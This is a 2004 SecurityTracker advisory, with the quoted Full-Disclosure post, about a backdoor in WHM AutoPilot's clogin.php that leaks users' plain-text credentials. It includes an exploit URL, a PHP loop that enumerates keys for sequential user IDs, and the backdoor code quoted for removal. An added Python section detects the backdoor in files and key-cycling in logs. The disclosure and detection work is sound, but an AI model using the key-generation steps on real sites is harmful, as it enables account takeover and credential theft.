SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Generic)  >   WHM AutoPilot Vendors:   Benchmark Designs
WHM AutoPilot Backdoor Discloses Authentication Credentials to Remote Users
SecurityTracker Alert ID:  1010833
SecurityTracker URL:  http://securitytracker.com/id/1010833
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Aug 2 2004
Impact:   Disclosure of authentication information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 2.4.5
Description:   A vulnerability was reported in WHM AutoPilot. A remote user can exploit a backdoor function to obtain a target user's authentication credentials.

An anonymous user reported that the 'clogin.php' login page contains a backdoor. A remote user can supply an HTTP GET request with a specially crafted 'c' parameter value to gain access to a target user's account. The parameter value is based on the target user's User ID field, encrypted by the clogin_e() function and then Base64 encoded. The User ID fields are incrementally generated and can readily be guessed, the report indicated.

A demonstration exploit URL is provided:

http://[target domain]/accounts/clogin.php?c=[KEY]

A remote user can supply this type of URL to obtain a target user's username and password.

The vendor was reportedly notified on August 1, 2004.

Impact:   A remote user can obtain a target user's username and password and then gain access to the system with the target user's credentials.
Solution:   No vendor solution was available at the time of this entry.

According to the report, the following backdoor code can be removed from 'clogin.php':

if (isset($c))
{
$c=clogin_d(base64_decode($c));

$query="select ";
$query.="username, ";
$query.="password ";
$query.="from ";
$query.="user ";
$query.="where ";
$query.="uid='".addslashes(trim($c))."' ";
$query.="limit 0, 1";

$rs=mysql_fetch_row(mysql_query($query));

$username=$rs[0];
$password=clogin_d(base64_decode($rs[1]));
}

This will disable Administrative logins for standard users.

Vendor URL:  www.whmautopilot.com/index.php
Cause:   Access control error, Authentication error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.
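Two defender-side checks for the issue described above, added here and not part of the advisory or of the vendor's code: backdoor_present() tests whether a copy of 'clogin.php' still carries the backdoor block quoted in the Solution, and clogin_key_requests() plus flag_enumeration() pick out requests to clogin.php that carry a 'c' parameter from a web-server access log and flag clients that cycle through several keys, which the sequential User ID makes the expected pattern. The Apache common log format and all sample inputs are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit
# Markers of the backdoor block quoted in the advisory: GET parameter 'c' is
# base64-decoded and handed to clogin_d() before the account lookup.
_BACKDOOR_MARKERS = (
    re.compile(r"isset\s*\(\s*\$c\s*\)"),
    re.compile(r"clogin_d\s*\(\s*base64_decode\s*\(\s*\$c\s*\)\s*\)"),
)

def backdoor_present(php_source: str) -> bool:
    """True if clogin.php still contains both markers of the backdoor block."""
    return all(p.search(php_source) for p in _BACKDOOR_MARKERS)

# Apache/NCSA common log line (assumed format): client, request line, status.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def clogin_key_requests(log_lines):
    """Return (client_ip, c_value, status) for each hit on clogin.php that carries 'c'."""
    hits = []
    for line in log_lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("path"))
        if not url.path.endswith("/clogin.php"):
            continue
        c_values = parse_qs(url.query).get("c")
        if c_values:
            hits.append((m.group("ip"), c_values[0], int(m.group("status"))))
    return hits

def flag_enumeration(hits, threshold=3):
    """Clients that presented at least `threshold` distinct keys: uids are sequential, so many keys means cycling."""
    keys_by_ip = {}
    for ip, key, _status in hits:
        keys_by_ip.setdefault(ip, set()).add(key)
    return sorted(ip for ip, keys in keys_by_ip.items() if len(keys) >= threshold)

# Constructed samples (not from the advisory): a file still carrying the backdoor,
# a cleaned file, and an access log with one client cycling through keys.
VULN_SRC = 'if (isset($c))\n{\n$c=clogin_d(base64_decode($c));\n}\n'
CLEAN_SRC = 'if (isset($_POST["username"]))\n{\n// normal form login only\n}\n'
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Aug/2004:10:00:01 +0000] "GET /accounts/clogin.php?c=QUJDRA== HTTP/1.0" 200 512',
    '203.0.113.5 - - [02/Aug/2004:10:00:02 +0000] "GET /accounts/clogin.php?c=QUJDRQ== HTTP/1.0" 200 512',
    '203.0.113.5 - - [02/Aug/2004:10:00:03 +0000] "GET /accounts/clogin.php?c=QUJDRg== HTTP/1.0" 200 512',
    '198.51.100.7 - - [02/Aug/2004:10:05:00 +0000] "GET /accounts/clogin.php HTTP/1.0" 200 480',
]
```

A single key from a known administrator address is not by itself suspicious under the reported design; the threshold targets the enumeration pattern the report describes.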


 Source Message Contents

Subject:  [Full-Disclosure] Benchmark Designs' WHM Autopilot backdoor vulnerability to plain-text password.


Subject:
Benchmark Designs' WHM Autopilot (Probably all versions up to 2.4.5) vulnerable to plain-text
credential leakage via backdoor.


Preamble:
Benchmark Designs' WHM Autopilot is a client management system made for webhosts, in order to 
simplify webhosting business management. It manages CPanel (http://www.cpanel.net/) and WHM 
(http://www.cpanel.net/) accounts, including account creation, maintenance, and removal. It is 
meant to be a solution to automate account billing and account creation.

(Taken from http://www.whmautopilot.com/index.php)
Started by a webhost looking for more out of a simple management script, Brandee Diggs (Owner of
Spinn A Web Cafe, Founder of Benchmark Designs) set out to build an internal management system that
could handle the day to day operations of a normal hosting company. The key was to remove the need
to constantly watch your orders and manage the installs. Alas, WHM AutoPilot was born.

Knowing that the industry is constantly changing and the demands and needs of every webhost is
different, the developers decided to pull in most of the suggestions from the licensee webhosts and
add those requests as features into the script. Essentially making the WHM AutoPilot the script built
for webhosts, by webhosts - and it is still built that way today.


Problem:
Benchmark Designs' WHM Autopilot is vulnerable to plain-text credential leakage due to a bug in 
client logins. In the client login page (/clogin.php) there is a built in backdoor for 
administrators to login as standard user accounts. This backdoor is accessed using the GET var 
'c'. This variable is nothing more than an encrypted user ID, which is an automatically 
incremented field in the database. Using WHM Autopilot's encryption functions clogin_e(), and the 
PHP method base64_encode(), one can generate the hash required to get a user's username and 
plain-text password. The required WHM Autopilot functions are found in /inc/client_functions.php.
Since the user ID field is automatically incremented, one can generate keys for as many accounts 
as desired. The code to generate these keys would be:

<?php
$numAccounts = 5; // Set to any #
for($i=1; $i <= $numAccounts; $i++) {
        echo base64_encode(clogin_e($i))."<br />";
}
?>

This code creates a list of values to feed to clogin.php as the GET variable 'c'. Once the complete
URI is requested, including the GET var (e.g. http://somedomain/accounts/clogin.php?c=KEY), the
login form will automatically take on the plain-text values of the account's username and password.
Note that the passwords are stored using the same encryption methods as we find for the user ID
here. I have found that you do not always get a fully working key on the first try. Sometimes the
key you generate is only good enough to get you a plaintext username, but an encrypted password. If
this is the case, continue generating the keys until you get one that gives you the plain-text
password. Once the username and password are achieved, a simple click of the login button
accesses an entire user account, including CPanel access, account cancellation access, and payment
functions access.


Workaround:
This bug can be fixed by removing the backdoor. Since clogin.php is thankfully not encoded with the
Zend Optimizer, the backdoor code can be removed. The backdoor code needing to be removed is the
following:

if (isset($c))
        {
        $c=clogin_d(base64_decode($c));

        $query="select ";
        $query.="username, ";
        $query.="password ";
        $query.="from ";
        $query.="user ";
        $query.="where ";
        $query.="uid='".addslashes(trim($c))."' ";
        $query.="limit 0, 1";

        $rs=mysql_fetch_row(mysql_query($query));

        $username=$rs[0];
        $password=clogin_d(base64_decode($rs[1]));
        }

On version 2.4.5, this code is from line 77 to line 94. Simply removing this code, and saving the
file, will remove this vulnerability. Removing this code will disable Administrative logins for
standard users, but the vendor could easily conjure a workaround for that. Ultimately however, user
credentials should not be stored in a form that can be resolved to plain-text, one way hashes
should be used for added security, and no backdoors should exist.

An alternative workaround would be to use another vendor, that doesn't put backdoors in their code.
Perhaps an open-source solution should be sought.


Vendor Contact:
Benchmark Designs' WHM Autopilot
URL: http://www.whmautopilot.com/
E-Mail: info@whmautopilot.com
Mailing Address:
  WHM AutoPilot HCMS
  P.O. Box 401
  Secretary, Maryland 21664


Disclosure Timeline:
Problem Discovered: July 30, 2004
Vendor Notified: August 1, 2004
Public Release: August 1, 2004


About the Author:
The author is a student at the Rochester Institute of Technology, majoring in Software 
Engineering.
When he's not contracting programming projects, he enjoys fishing, soccer, basketball, and 
computer gaming. The author has a passion for anything UNIX, and has grown to detest Microsoft 
beyond his ability to represent that detest in text.

The author is posting this message anonymously due to the draconian license of the product. Being
wary of legal consequences, the author decided it was best to release this message
anonymously and forfeit credit for the find. Perhaps the vendor should pursue one of two paths; The
vendor should either release their product under a more open license, or charge less money for a
product that can so easily jeopardize the stability of a business.


Greets:
I'd like to say hi to George, swoolley, and tautology, and to thank swoolley and tautology for 
helping to make this post possible.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Copyright 2018, SecurityGlobal.net LLC